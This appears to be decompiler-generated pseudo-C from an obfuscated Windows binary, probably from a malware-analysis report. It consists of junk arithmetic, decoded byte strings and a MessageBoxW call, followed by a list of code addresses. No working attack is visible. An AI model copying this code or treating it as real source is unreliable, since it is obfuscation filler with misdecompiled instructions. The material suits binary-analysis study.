								__eflags = 0x4f - ( *(_t2796 - 6) & 0x000000ff);
								_t2455 =  *(_t2796 - 6) & 0x000000ff;
								asm("sbb ecx, ecx");
								__eflags = 0 - _t2455;
								asm("sbb edx, edx");
								__eflags = _t2455 + 1 -  *(_t2796 - 4) + 1;
								if(_t2455 + 1 >  *(_t2796 - 4) + 1) {
									asm("cdq");
									 *0x1000ce0 =  *0x1000ce0;
									asm("sbb [0x1000ce4], edx");
									 *(_t2796 - 0x18) =  *(_t2796 - 0x70) - 0x23c803e3;
									 *(_t2796 - 0x28) =  *0x1215420;
									 *0x1000cd2 = 0 - ( *(_t2796 - 0xa0) ^ 0);
									_t2086 = ( *(_t2796 - 8) & 0xff) +  *(_t2796 - 0x6c) + 1;
									__eflags = _t2086;
									 *0x1000cd8 = _t2086;
								}
								 *(_t2796 - 0xa8) =  *(_t2796 - 0x20) + 0x83;
								__eflags =  *(_t2796 - 0xa0) |  *(_t2796 - 0x9c);
								if(__eflags == 0) {
									asm("sbb eax, eax");
									asm("cdq");
									_t2458 =  *(_t2796 - 0x30) & 0x0000ffff;
									asm("cdq");
									asm("sbb edx, ebx");
									 *0x1000d18 = E00ECEE50(( ~( *(_t2796 - 0x28)) + 1) * ( *(_t2796 - 0x1c) & 0x0000ffff),  *(_t2796 - 0x1c) & 0x0000ffff, _t2458 -  *(_t2796 - 0x48), _t2458);
									 *0x1000d1c = _t2458;
									 *0x1000cd8 = ( *0x1000c9b & 0x000000ff) - 0x23e5;
									_t1765 = 0;
									__eflags = 0;
								} else {
									 *(_t2796 - 0x4c) = E00EC1370(__eflags) & 0x000000ff;
									_t2542 =  *(_t2796 - 0x4c);
									__eflags = _t2542;
									if(_t2542 <= 0) {
										_t1483 =  *0x1000cac; // 0x106b42
										__eflags = _t1483 -  *0x1000c8c; // 0xfff500a5
										if(__eflags > 0) {
											L244:
											_t1485 =  *(_t2796 - 0xa) & 0x000000ff;
											asm("cdq");
											__eflags = _t2542 -  *0x1000d14;
											if(__eflags < 0) {
												L248:
												_t1486 = 0;
												__eflags = 0;
											} else {
												if(__eflags > 0) {
													L247:
													_t1486 = 1;
												} else {
													__eflags = _t1485 -  *0x1000d10;
													if(_t1485 <=  *0x1000d10) {
														goto L248;
													} else {
														goto L247;
													}
												}
											}
											 *(_t2796 - 8) =  *0x1000c90 - ( *(_t2796 - 8) == 0);
											__eflags = _t1486 - ( *0x1000c90 ==  *(_t2796 - 8) == 0);
											if(_t1486 <= ( *0x1000c90 ==  *(_t2796 - 8) == 0)) {
												_t2545 =  *0x1215420;
												 *(_t2796 - 0x80) = _t2545;
												asm("cdq");
												asm("cdq");
												_t1492 = E00ECEE50(E00ECEE50( *(_t2796 - 0x24), _t2545, ( *0x1000cd4 & 0x0000ffff) + 0x43, _t2545), _t2545,  *0x1000d18,  *0x1000d1c);
												 *0x1000ce4 = _t2545;
												 *0x1000ce0 = _t1492;
												 *(_t2796 - 0x88) = (( *(_t2796 - 3) & 0x000000ff) - ( *(_t2796 - 6) & 0x000000ff)) *  *0x1000d18;
												 *(_t2796 - 0x2c) = ( *(_t2796 - 0x84) & 0x0000ffff) - 0x86;
											}
										} else {
											if(__eflags < 0) {
												L243:
												 *(_t2796 - 2) =  *(_t2796 - 0x80) - 0x6b;
											} else {
												_t2079 =  *0x1000ca8; // 0x7b8b5249
												__eflags = _t2079 -  *0x1000c88; // 0xa666078f
												if(__eflags > 0) {
													goto L244;
												} else {
													goto L243;
												}
											}
										}
									}
								}
								_t2460 =  *(_t2796 - 0x20) + 0x373;
								 *(_t2796 - 0xb8) = _t2460;
								_t2766 =  *(_t2796 - 0x58);
								_t1367 =  *(_t2796 - 0x30);
								asm("cdq");
								__eflags = _t2460 -  *(_t2796 - 0x54);
								if(__eflags > 0) {
									L256:
									_t1368 = 0;
									__eflags = 0;
								} else {
									if(__eflags < 0) {
										L255:
										_t1368 = 1;
									} else {
										__eflags = _t1367 - _t2766;
										if(_t1367 > _t2766) {
											goto L256;
										} else {
											goto L255;
										}
									}
								}
								__eflags =  *(_t2796 - 0x30) - 0x54;
								_t2462 = 0 |  *(_t2796 - 0x30) - 0x00000054 <= 0x00000000;
								__eflags = _t1368 - _t2462;
								if(_t1368 < _t2462) {
									 *(_t2796 - 9) =  *0x1000cd0;
									 *0x1000ca4 =  *0x1000cb4;
								} else {
									asm("cdq");
									 *(_t2796 - 0x48) =  *(_t2796 - 0x48) - E00ECEE50( *(_t2796 - 0x48),  *(_t2796 - 0x44),  *0x1000c9c, _t2462);
									asm("sbb [ebp-0x44], edx");
									 *(_t2796 - 0xc) = 0x53;
									_t2541 =  *(_t2796 - 0x24);
									_t1481 = _t2541 - 0xff34;
									__eflags = _t1481;
									asm("cdq");
									 *0x1000cc0 = _t1481;
									asm("ror byte [eax+eax], 0x1");
									 *0x1000cc4 = _t2541;
								}
								_t2464 =  *(_t2796 - 0x20) + 0x117;
								 *(_t2796 - 0xb8) = _t2464;
								 *0x1000ca4 = E00EC1700();
								asm("cdq");
								asm("adc edx, 0xcae43");
								__eflags =  !( *0x1000c9f) + 0x0dc8da25 | _t2464;
								if(( !( *0x1000c9f) + 0x0dc8da25 | _t2464) != 0) {
								}
								__eflags =  *(_t2796 - 0xa8) - 0x3b0;
								if( *(_t2796 - 0xa8) != 0x3b0) {
									 *(_t2796 - 0x6c) =  *(_t2796 - 0x6c) &  *0x1109ef0;
									 *(_t2796 - 0x88) =  *(_t2796 - 0x88) -  *(_t2796 - 0x78) &  *(_t2796 - 0x88);
									 *((char*)(_t2796 - 0xfc)) = 0x97;
									 *((char*)(_t2796 - 0xfb)) = 0xaf;
									 *((char*)(_t2796 - 0xfa)) = 0xb7;
									 *((char*)(_t2796 - 0xf9)) = 0xb9;
									 *((char*)(_t2796 - 0xf8)) = 0xbc;
									 *((char*)(_t2796 - 0xf7)) = 0xc3;
									 *((char*)(_t2796 - 0xf6)) = 0x6a;
									 *((char*)(_t2796 - 0xf5)) = 0xb0;
									 *((char*)(_t2796 - 0xf4)) = 0xab;
									 *((char*)(_t2796 - 0xf3)) = 0xbf;
									 *((char*)(_t2796 - 0xf2)) = 0xb6;
									 *((char*)(_t2796 - 0xf1)) = 0xbe;
									_t2767 = 0;
									do {
										_t1996 =  *0x1000cc0; // 0xffff970a
										__eflags = _t1996 |  *0x1000cc4;
										if((_t1996 |  *0x1000cc4) == 0) {
											_t2469 =  *(_t2796 - 7);
											_t1378 = _t2469;
											asm("cdq");
											__eflags =  *0x1000cbc - _t2469;
											if(__eflags < 0) {
												L273:
												_t1379 = 0;
												__eflags = 0;
											} else {
												if(__eflags > 0) {
													L272:
													_t1379 = 1;
												} else {
													__eflags =  *0x1000cb8 - _t1378;
													if( *0x1000cb8 <= _t1378) {
														goto L273;
													} else {
														goto L272;
													}
												}
											}
											__eflags =  !_t1379;
											if( !_t1379 == 0) {
												__eflags =  *0x1000ce0 |  *0x1000ce4;
												if(( *0x1000ce0 |  *0x1000ce4) != 0) {
													_t2538 =  *(_t2796 - 0x70) &  *0x1000ce0;
													 *0x1000ce0 = E00ECEE50(_t2538, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
													 *0x1000ce4 = _t2538;
													 *0x1000cd8 =  *(_t2796 - 0x40) * 0xffffe4ed;
													_t1477 =  *0x1000d20 & 0xffffb755;
													__eflags = _t1477;
													 *(_t2796 - 0x5c) = _t1477;
												}
											} else {
												 *0x1000c84 =  *0x1000c84 + 1;
											}
										} else {
											 *0x1000c84 = 0x9b;
											 *(_t2796 - 8) = 1;
										}
										_t2470 =  *0x1000d08;
										_t2000 =  *0x1000cf4; // 0x2b91c
										asm("cdq");
										_t2471 =  *0x1000cf0; // 0xd43579fe
										 *(_t2796 - 0xa8) = _t2470;
										_t1387 = E00ECEE50(_t2471, _t2000, 0x1faed387, _t1765);
										asm("sbb edx, edi");
										_t1765 = 0;
										__eflags = _t1387 -  !( *(_t2796 - 2) ^ _t2470) | _t2471;
										 *0x1000cf4 = 0;
										 *0x1000cf0 = 1;
										if((_t1387 -  !( *(_t2796 - 2) ^ _t2470) | _t2471) != 0) {
											 *0x1000cf0 = 0;
										}
										_t2002 =  *0x1000ca4; // 0x9b27
										 *0x1000c90 = 0xb8f675f1 - ( *(_t2796 - 1) & 0x000000ff);
										_t2474 =  *0x1000cdc; // 0x84521e70
										__eflags =  *(_t2796 - 0x24) & 0x0000ffff;
										_t2767 = _t2767 + 1;
										 *0x1000d10 = ( *(_t2796 - 1) & 0x000000ff) *  *(_t2796 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t2796 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t2002 + _t2474));
										__eflags = _t2767 - 0xc;
										 *(_t2796 + _t2767 * 2 - 0x1ae) = ( *(_t2796 + _t2767 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
										 *0x1000d14 = _t1765;
									} while (_t2767 < 0xc);
									_t2482 = 0x92 - ( *(_t2796 - 0xac) ^  *(_t2796 - 0xb4));
									_t1399 = M01000CB0; // 0x0
									 *(_t2796 - 0x194) = _t2482;
									 *0x1000cc0 = 2;
									 *0x1000cc4 = _t1765;
									_t1400 = E00ECEE50(_t1399, _t1765, 0xbe790e28, 0x61b36);
									 *0x1000d1c = _t2482;
									 *0x1000d18 = _t1400;
									_t1402 =  *0x1000cc0; // 0xffff970a
									_t2015 =  *0x1000cc4; // 0xffffffff
									 *0x1000c94 =  *(_t2796 - 0x1c) +  *(_t2796 - 1) + 1;
									_t2486 = _t1402 | _t2015;
									__eflags = _t2486;
									if(_t2486 == 0) {
										_t2488 = 1 -  *(_t2796 - 0x78);
										asm("sbb eax, ecx");
										_t1405 = E00ECEE50(_t2488, 0,  *0x1000ca8,  *0x1000cac);
										 *0x1000cac = _t2488;
										_t2486 =  *0x1000c83 & 0x000000ff;
										M01000CB0 = M01000CB0 ^ _t2486;
										__eflags = M01000CB0;
										 *0x1000ca8 = _t1405;
									} else {
										__eflags = _t1402 - 1;
										if(_t1402 != 1) {
											L284:
											__eflags = _t1402 - 2;
											if(_t1402 == 2) {
												__eflags = _t2015 - _t1765;
												if(_t2015 == _t1765) {
													 *(_t2796 - 0xbc) = _t1765;
													__eflags =  *(_t2796 - 0x24);
													if( *(_t2796 - 0x24) != 0) {
														_t2057 = 0;
														__eflags = 0;
													} else {
														_t2057 = 1;
													}
													 *(_t2796 - 0xbc) = _t1765;
													__eflags =  *(_t2796 - 0xb);
													if( *(_t2796 - 0xb) != 0) {
														_t1467 = 0;
														__eflags = 0;
													} else {
														_t1467 = 1;
													}
													 *(_t2796 - 0x18) = ( *(_t2796 - 0x78) - _t2057) *  *0x1000d10 * _t1467;
													asm("cdq");
													asm("sbb esi, edx");
													_t2486 =  *(_t2796 - 0x48);
													asm("sbb esi, eax");
													 *(_t2796 - 0x48) =  *(_t2796 - 0x48) -  *(_t2796 - 7) - _t2486;
												}
											}
										} else {
											__eflags = _t2015 - _t1765;
											if(_t2015 == _t1765) {
												 *0x1000d18 =  *0x1215420;
												 *0x1000d1c = _t1765;
												 *(_t2796 - 2) =  *(_t2796 - 2) & 0x000000ff &  *(_t2796 - 0x80) & 0x0000ffff |  *(_t2796 - 2) & 0x000000ff;
												_t2486 =  *0x10ae26c;
												 *0x1000d20 =  *0x1000d20 | _t2486;
											} else {
												goto L284;
											}
										}
									}
									 *((char*)(_t2796 - 0xdc)) = 0xe5;
									 *((char*)(_t2796 - 0xdb)) = 0xdd;
									 *((char*)(_t2796 - 0xda)) = 0xe5;
									 *((char*)(_t2796 - 0xd9)) = 0xe7;
									 *((char*)(_t2796 - 0xd8)) = 0xea;
									 *((char*)(_t2796 - 0xd7)) = 0xf1;
									_t1408 = E00EC1190() & 0x000000ff;
									__eflags = _t1408 - _t1765;
									 *0x1000cd8 = _t1408;
									if(_t1408 > _t1765) {
										asm("cdq");
										 *0x1000d1c = _t1765;
										asm("adc edx, [0x1000cbc]");
										 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
										 *0x1000cc4 =  !_t2486;
										 *0x1000d18 =  *0x1215420;
										 *(_t2796 - 0x58) =  *(_t2796 - 0x58) + 1;
										asm("adc [ebp-0x54], ebx");
									}
									_t2019 =  *(_t2796 - 0x40);
									 *(_t2796 - 0x38) = _t2019 + _t2019 + _t2019 + _t2019 + _t2019 + _t2019 + _t2019 + _t2019;
									 *(_t2796 - 0x34) = ( *(_t2796 - 0x3c) << 0x00000020 | _t2019) << 3;
									 *0x10ae368 =  *(_t2796 - 0x38);
									_t2768 = 0;
									__eflags = 0;
									do {
										_t2491 =  *(_t2796 - 0xb);
										__eflags =  *0x1000c9b - _t2491; // -28
										if(__eflags >= 0) {
											__eflags =  *(_t2796 - 1);
											if( *(_t2796 - 1) == 0) {
												_t1412 =  *(_t2796 - 0x6c);
												_t2727 =  *(_t2796 - 0x34);
												asm("cdq");
												__eflags = _t1412 -  *(_t2796 - 0x38);
												if(_t1412 !=  *(_t2796 - 0x38)) {
													L303:
													 *(_t2796 - 0x90) =  *(_t2796 - 0x40) +  *0x1000d10 +  *0x1000c84 -  *(_t2796 - 1);
													 *(_t2796 - 0x2c) =  *(_t2796 - 0x2c) - ( *(_t2796 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
													 *0x1000ca0 =  *0x1000ca0 +  *(_t2796 - 0x7c);
													 *0x1000c9e =  *0x1215420;
													 *0x1000c88 =  *0x1000c88 -  *(_t2796 - 0x40);
													asm("sbb [0x1000c8c], eax");
												} else {
													__eflags = _t2491 - _t2727;
													if(_t2491 == _t2727) {
														_t2049 =  *0x1000c88 |  *0x1000c8c;
														__eflags = _t2049;
														 *_t2049 =  *_t2049 + _t1412;
														__eflags =  *_t2049;
														if( *_t2049 != 0) {
															_t2731 =  *(_t2796 - 0x74);
															_t1418 =  *0x1000c83 & 0x000000ff;
															asm("cdq");
															_t2051 =  *(_t2796 - 0x78) - _t1418;
															__eflags = _t2051;
															asm("enter 0xfa1b, 0x8b");
															_push(_t2796);
															 *0x3DE8FE44 = _t2051;
															 *(_t2796 - 0x78) = _t2051;
															 *(_t2796 - 0x74) = _t2731 & _t1418;
															 *(_t2796 - 0xa) = ( *(_t2796 - 0xa) & 0x000000ff) + ( *(_t2796 - 0x18) & 0x0000ffff);
															_t1419 =  *(_t2796 - 4);
															 *0x1000cf0 = 0x73c571ff;
															_t2056 = _t1419 +  *0x1000cc8 + 1;
															__eflags = _t2056;
															 *0x1000cd4 = _t2056;
															 *0x1000cf4 = 0;
															_t1420 = _t1419 + 0x1000cf4;
															__eflags = _t1420;
															 *_t2056 =  *_t2056 + _t1420;
															 *_t1420 =  *_t1420 + _t1420;
															 *_t1420 =  *_t1420 + _t1420;
															__eflags =  *_t1420;
														}
													} else {
														goto L303;
													}
												}
											} else {
												_t2047 =  *0x1000d04; // 0xffffffff
												asm("cdq");
												_t1422 =  *0x1000d00; // 0xfffff835
												_t2527 = _t2491 & _t2047;
												 *0x1000d00 = E00ECEE50( *(_t2796 - 0x1c) & _t1422, _t2527, _t1422, _t2047);
												 *0x1000d04 = _t2527;
											}
										}
										 *(_t2796 + _t2768 * 2 - 0x160) = ( *(_t2796 + _t2768 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
										_t2768 = _t2768 + 1;
										__eflags = _t2768 - 6;
									} while (_t2768 < 6);
									_t2028 =  *0x1000d00; // 0xfffff835
									 *0x1000ce0 = 2;
									 *0x1000ce4 = 0;
									 *(_t2796 - 0x70) = _t2028 * 0x6eb594ba;
									_t2030 =  *0x1000ce4; // 0x0
									 *0x110030c =  *(_t2796 - 0x60);
									_t1425 =  *0x1000ce0; // 0x0
									_t2497 = _t1425 | _t2030;
									__eflags = _t2497;
									if(_t2497 == 0) {
										 *(_t2796 - 0xbc) = 0;
										__eflags =  *(_t2796 - 6);
										if( *(_t2796 - 6) != 0) {
											_t1426 = 0;
											__eflags = 0;
										} else {
											_t1426 = 1;
										}
										_t2032 =  *0x1000d00 + _t1426;
										__eflags = _t2032;
										 *(_t2796 - 0x24) =  !_t2032;
									} else {
										__eflags = _t1425 - 1;
										if(_t1425 != 1) {
											L319:
											__eflags = _t1425 - 2;
											if(_t1425 == 2) {
												__eflags = _t2030;
												if(_t2030 == 0) {
													_t1451 =  *0x1000cdc; // 0x84521e70
													 *(_t2796 - 0x60) = ( *(_t2796 - 0x68) ^ _t1451 ^  *0x1000d00) * (_t1451 + 0xffffbb58);
													_t2516 =  *0x1000c94; // 0x0
													_t2517 = _t2516 * 0x2d40daef;
													 *(_t2796 - 0x7c) =  *(_t2796 - 0x7c) * ( *0x1000cec & 0x0000ffff);
													 *(_t2796 - 0x90) = _t2517;
													asm("cdq");
													 *(_t2796 - 0x38) = ( *(_t2796 - 0x84) & 0x0000ffff) + ( *(_t2796 - 0x84) & 0x0000ffff) + ( *(_t2796 - 0x84) & 0x0000ffff) + ( *(_t2796 - 0x84) & 0x0000ffff) + ( *(_t2796 - 0x84) & 0x0000ffff) + ( *(_t2796 - 0x84) & 0x0000ffff) + ( *(_t2796 - 0x84) & 0x0000ffff) + ( *(_t2796 - 0x84) & 0x0000ffff);
													 *(_t2796 - 0x34) = _t2517;
												}
											}
										} else {
											__eflags = _t2030;
											if(_t2030 == 0) {
												asm("cdq");
												 *0x1000cb8 =  *(_t2796 - 4) - 0x4fef3c23;
												 *0x1000cbc = _t2497;
												 *(_t2796 - 0x4c) =  *0x1215420;
												 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
											} else {
												goto L319;
											}
										}
									}
									_t2503 = ( *(_t2796 - 0xc4) +  *(_t2796 - 0xa4)) *  *(_t2796 - 0xc4) *  *(_t2796 - 0x14) ^ 0x0000701c;
									__eflags = _t2503;
									 *((short*)(_t2796 - 0x154)) =  ~_t2503;
									_t1428 = 0x20b;
									do {
										 *(_t2796 - 0xb) =  *(_t2796 - 0xb) + 1;
										_t1428 = _t1428 - 1;
										__eflags = _t1428;
									} while (_t1428 > 0);
									_t1431 = ( *(_t2796 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
									__eflags = _t1431;
									 *0x1000c84 = 0;
									if(_t1431 != 0) {
										_t2769 = 0;
										__eflags = 0;
									} else {
										_t881 = _t1431 + 1; // 0x20b
										_t2769 = _t881;
									}
									asm("cdq");
									_t2508 =  *(_t2796 - 0x2c);
									asm("cdq");
									asm("adc edx, [0x1000cc4]");
									_t1437 = E00ECEE50(( *(_t2796 - 0x18) & 0x0000ffff) + ( *(_t2796 - 0xc) & 0x000000ff) + 1,  *(_t2796 - 0xc), _t2508 +  *0x1000cc0, _t2508);
									asm("sbb edx, edi");
									__eflags = _t1437 - _t2769 | _t2508;
									 *0x1000c83 = 1;
									if((_t1437 - _t2769 | _t2508) != 0) {
										 *0x1000c83 = 0;
									}
									__eflags =  *0x1000c84;
									if( *0x1000c84 == 0) {
										 *(_t2796 - 0x24) = 0x83;
										asm("cdq");
										 *0x1000cc8 = ( *(_t2796 - 0x18) & 0x0000ffff) + 0xf;
										_t1443 =  *0x1000cd0; // 0x0
										 *0x1000ccc = _t2508;
										 *(_t2796 - 5) =  *(_t2796 - 3) +  *(_t2796 - 0x28) + (_t1443 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
										asm("cdq");
										 *(_t2796 - 0xa0) =  *(_t2796 - 0xa0) -  *0x1000cd0 - 0x3811;
										asm("sbb [ebp-0x9c], edx");
									}
									_t894 = _t2796 - 0x160; // 0x60f1ba1c
									_t2389 = _t894;
									_t895 = _t2796 - 0x1ac; // 0x60f1b9d0
									_t1216 = _t895;
									L410:
									MessageBoxW(GetForegroundWindow(), _t1216, _t2389, 0x10);
								}
								goto L411;
							} else {
								if( *(_t2796 - 0x70) != 0 ||  *(_t2796 - 9) != 0) {
									_t2733 = 0xcb;
									do {
										_t2581 =  *(_t2796 - 0x28);
										_t1544 = E00EC1370(__eflags) & 0x000000ff;
										asm("cdq");
										 *0x1000cb8 = _t1544;
										 *0x1000cbc = _t2581;
										__eflags = _t2581 - _t1765;
										if(_t2581 > _t1765) {
											L192:
											_t1545 =  *0x1000c98 & 0x0000ffff;
											_t2117 =  *0x1000cac; // 0x106b42
											_t2774 =  *0x1000ca8; // 0x7b8b5249
											asm("cdq");
											_t2775 =  !_t2774;
											__eflags = _t2581 -  !_t2117;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													L195:
													 *(_t2796 - 0x88) =  *(_t2796 - 0x58) + 0xc125;
													_t2120 =  *0x1000cf4; // 0x2b91c
													_t2121 =  *0x1000cf0; // 0xd43579fe
													asm("cdq");
													 *0x1000cf0 = E00ECEE50( *(_t2796 - 4) * 0x63,  *(_t2796 - 4), _t2121, _t2120);
													_t1553 =  *(_t2796 - 1);
													 *0x1000cf4 = _t1553 *  *0x1000c88 >> 0x20;
													 *(_t2796 - 1) = _t1553 *  *0x1000c88;
													M01000CB0 = 4;
													 *(_t2796 - 0x58) =  *(_t2796 - 0x58) + 1;
													asm("adc [ebp-0x54], ebx");
												} else {
													__eflags = _t1545 - _t2775;
													if(_t1545 < _t2775) {
														goto L195;
													}
												}
											}
										} else {
											__eflags = _t1544 - 0x42;
											if(_t1544 >= 0x42) {
												goto L192;
											}
										}
										 *0x1000cf0 =  *0x1000cf0 + 1;
										asm("adc [0x1000cf4], ebx");
										_t2733 = _t2733 - 1;
										__eflags = _t2733;
									} while (__eflags != 0);
									goto L197;
								} else {
									asm("cdq");
									if(( *(_t2796 - 0x8c) |  *0x1000cb8 |  *(_t2796 - 0x8c) |  *0x1000cbc) == 0) {
										__eflags =  *0x1000ca0 - _t1765; // 0x5247
										if(__eflags == 0) {
											L197:
											E00EC1970();
											L00EC1DA0();
											__eflags = 0;
											return 0;
										} else {
											 *0x1000d10 = 0x2bd9;
											 *0x1000d14 = _t1765;
											 *(_t2796 - 0x28) = ( *(_t2796 - 0x70) & 0xcecd084b) *  *(_t2796 - 0x28);
											 *(_t2796 - 0x6c) = ( *(_t2796 - 5) & 0x000000ff) *  *(_t2796 - 7);
											M01000CB0 =  *(_t2796 - 0xf) * M01000CB0;
											 *(_t2796 - 0x4c) =  *0x1215420;
											E00EC1970();
											L00EC1DA0();
											__eflags = 0;
											return 0;
										}
									} else {
										_t2126 =  *0x1000c9e; // 0x0
										 *(_t2796 - 7) =  *(_t2796 - 0x28) +  *(_t2796 - 0x90);
										 *0x1000c9b = _t2126 - 0x26;
										E00EC1970();
										L00EC1DA0();
										return 0;
									}
								}
							}
						}
					}
				}
			}

















































































































































































































































































































































                                              0x00ec3f9a
                                              0x00ec3f9b
                                              0x00ec3f9d
                                              0x00ec3f9d
                                              0x00ec3fa1
                                              0x00ec3fa6
                                              0x00ec3fa7
                                              0x00ec3fa9
                                              0x00ec3faa
                                              0x00ec3fab
                                              0x00ec3fad
                                              0x00ec3fb7
                                              0x00ec3fbd
                                              0x00ec3fc4
                                              0x00ec3fd7
                                              0x00ec3fdd
                                              0x00ec3fde
                                              0x00ec3fe4
                                              0x00ec3fe6
                                              0x00ec3feb
                                              0x00ec3fed
                                              0x00ec3ff3
                                              0x00ec3ff6
                                              0x00ec4000
                                              0x00ec4004
                                              0x00ec4009
                                              0x00ec4009
                                              0x00ec400e
                                              0x00ec4016
                                              0x00ec4021
                                              0x00ec4027
                                              0x00ec4031
                                              0x00ec404b
                                              0x00ec4050
                                              0x00ec4075
                                              0x00ec407b
                                              0x00ec407c
                                              0x00ec407e
                                              0x00ec4090
                                              0x00ec4090
                                              0x00ec4090
                                              0x00ec4080
                                              0x00ec4080
                                              0x00ec4085
                                              0x00ec4087
                                              0x00000000
                                              0x00ec4089
                                              0x00ec4089
                                              0x00ec4089
                                              0x00ec4087
                                              0x00ec409b
                                              0x00ec409d
                                              0x00ec409f
                                              0x00ec40a9
                                              0x00ec40af
                                              0x00ec40ba
                                              0x00ec40bc
                                              0x00ec40c2
                                              0x00ec40c8
                                              0x00ec40d4
                                              0x00ec40e1
                                              0x00ec40ea
                                              0x00ec40f4
                                              0x00ec40f7
                                              0x00ec40fe
                                              0x00ec4105
                                              0x00ec410c
                                              0x00ec410d
                                              0x00ec410d
                                              0x00ec410f
                                              0x00ec4111
                                              0x00ec4117
                                              0x00ec4117
                                              0x00ec4052
                                              0x00ec4052
                                              0x00ec4057
                                              0x00ec4060
                                              0x00ec4060
                                              0x00ec4063
                                              0x00ec4065
                                              0x00000000
                                              0x00ec4067
                                              0x00ec4067
                                              0x00ec4067
                                              0x00ec4065
                                              0x00ec4126
                                              0x00ec412c
                                              0x00ec4131
                                              0x00ec4138
                                              0x00ec423b
                                              0x00ec4247
                                              0x00ec424b
                                              0x00ec413e
                                              0x00ec4143
                                              0x00ec4157
                                              0x00ec415b
                                              0x00ec416b
                                              0x00ec4171
                                              0x00ec4178
                                              0x00ec417b
                                              0x00ec417d
                                              0x00ec4193
                                              0x00ec4195
                                              0x00ec419b
                                              0x00ec41e5
                                              0x00ec41f6
                                              0x00ec41fd
                                              0x00ec41fe
                                              0x00ec420d
                                              0x00ec4215
                                              0x00ec4215
                                              0x00ec4217
                                              0x00ec421d
                                              0x00ec4224
                                              0x00ec4224
                                              0x00ec421f
                                              0x00ec421f
                                              0x00ec421f
                                              0x00ec422f
                                              0x00ec419d
                                              0x00ec419d
                                              0x00ec41a0
                                              0x00ec41c6
                                              0x00ec41ce
                                              0x00ec41da
                                              0x00ec41e0
                                              0x00ec41a2
                                              0x00ec41a5
                                              0x00ec41b1
                                              0x00ec41b1
                                              0x00ec41a5
                                              0x00ec41a0
                                              0x00ec419b
                                              0x00ec4255
                                              0x00ec4258
                                              0x00ec4260
                                              0x00ec42ca
                                              0x00ec42d5
                                              0x00ec42d7
                                              0x00ec42dd
                                              0x00ec42df
                                              0x00ec42e1
                                              0x00ec4313
                                              0x00ec4313
                                              0x00ec431a
                                              0x00ec4320
                                              0x00ec432a
                                              0x00ec4332
                                              0x00ec4337
                                              0x00ec433d
                                              0x00ec434d
                                              0x00ec4351
                                              0x00ec435c
                                              0x00ec4363
                                              0x00ec436e
                                              0x00ec4374
                                              0x00ec4383
                                              0x00ec43a2
                                              0x00ec43a8
                                              0x00ec43b1
                                              0x00ec43b7
                                              0x00ec43b7
                                              0x00ec43b9
                                              0x00ec43b9
                                              0x00ec42e3
                                              0x00ec42e3
                                              0x00ec42e9
                                              0x00ec42f0
                                              0x00ec42fb
                                              0x00ec4304
                                              0x00ec430a
                                              0x00ec42e5
                                              0x00ec42e5
                                              0x00ec42e7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec42e7
                                              0x00ec42e3
                                              0x00ec4262
                                              0x00ec4262
                                              0x00ec4270
                                              0x00ec4276
                                              0x00ec427e
                                              0x00ec4287
                                              0x00ec4287
                                              0x00ec4280
                                              0x00ec4280
                                              0x00ec4280
                                              0x00ec4298
                                              0x00ec42ab
                                              0x00ec42ae
                                              0x00ec42b4
                                              0x00ec42ba
                                              0x00ec42bd
                                              0x00ec42be
                                              0x00ec4270
                                              0x00ec43c5
                                              0x00ec43df
                                              0x00ec43e4
                                              0x00ec43ea
                                              0x00ec43ea
                                              0x00ec440a
                                              0x00ec4412
                                              0x00ec441c
                                              0x00ec4427
                                              0x00ec4433
                                              0x00ec4439
                                              0x00ec4471
                                              0x00ec448e
                                              0x00ec4495
                                              0x00ec449e
                                              0x00ec44a4
                                              0x00ec44ab
                                              0x00ec44b2
                                              0x00ec44c3
                                              0x00ec44c8
                                              0x00ec44ca
                                              0x00ec44cd
                                              0x00ec44d0
                                              0x00ec44d4
                                              0x00ec4512
                                              0x00ec4515
                                              0x00ec451a
                                              0x00ec4526
                                              0x00ec452b
                                              0x00ec452d
                                              0x00ec4533
                                              0x00ec453d
                                              0x00ec453f
                                              0x00ec453f
                                              0x00ec4552
                                              0x00ec455c
                                              0x00ec455c
                                              0x00ec455f
                                              0x00ec4564
                                              0x00ec456a
                                              0x00ec4575
                                              0x00ec44d6
                                              0x00ec44d9
                                              0x00ec44df
                                              0x00ec44e6
                                              0x00ec44f9
                                              0x00ec4500
                                              0x00ec4500
                                              0x00ec44d9
                                              0x00ec457e
                                              0x00ec45ad
                                              0x00ec45d6
                                              0x00ec4660
                                              0x00ec466b
                                              0x00ec4677
                                              0x00ec4685
                                              0x00ec468b
                                              0x00ec468e
                                              0x00ec468e
                                              0x00ec468e
                                              0x00ec45d8
                                              0x00ec45d8
                                              0x00ec45db
                                              0x00ec45de
                                              0x00ec45e4
                                              0x00ec45ee
                                              0x00ec45ee
                                              0x00ec45e6
                                              0x00ec45e6
                                              0x00ec45ec
                                              0x00ec45f5
                                              0x00ec45f5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec45ec
                                              0x00ec45fa
                                              0x00ec4600
                                              0x00ec4606
                                              0x00ec460d
                                              0x00ec460d
                                              0x00ec460d
                                              0x00ec460d
                                              0x00ec4611
                                              0x00ec461a
                                              0x00ec4620
                                              0x00ec4623
                                              0x00ec4625
                                              0x00ec4634
                                              0x00ec463d
                                              0x00ec4640
                                              0x00ec4643
                                              0x00ec4611
                                              0x00ec4691
                                              0x00ec4698
                                              0x00ec469b
                                              0x00ec469c
                                              0x00ec469f
                                              0x00ec46ae
                                              0x00ec46ae
                                              0x00ec46a7
                                              0x00ec46a7
                                              0x00ec46a7
                                              0x00ec46be
                                              0x00ec46c7
                                              0x00ec46c8
                                              0x00ec46d3
                                              0x00ec46d9
                                              0x00ec46e9
                                              0x00ec46ef
                                              0x00ec46f0
                                              0x00ec46f9
                                              0x00ec46ff
                                              0x00ec4705
                                              0x00ec470a
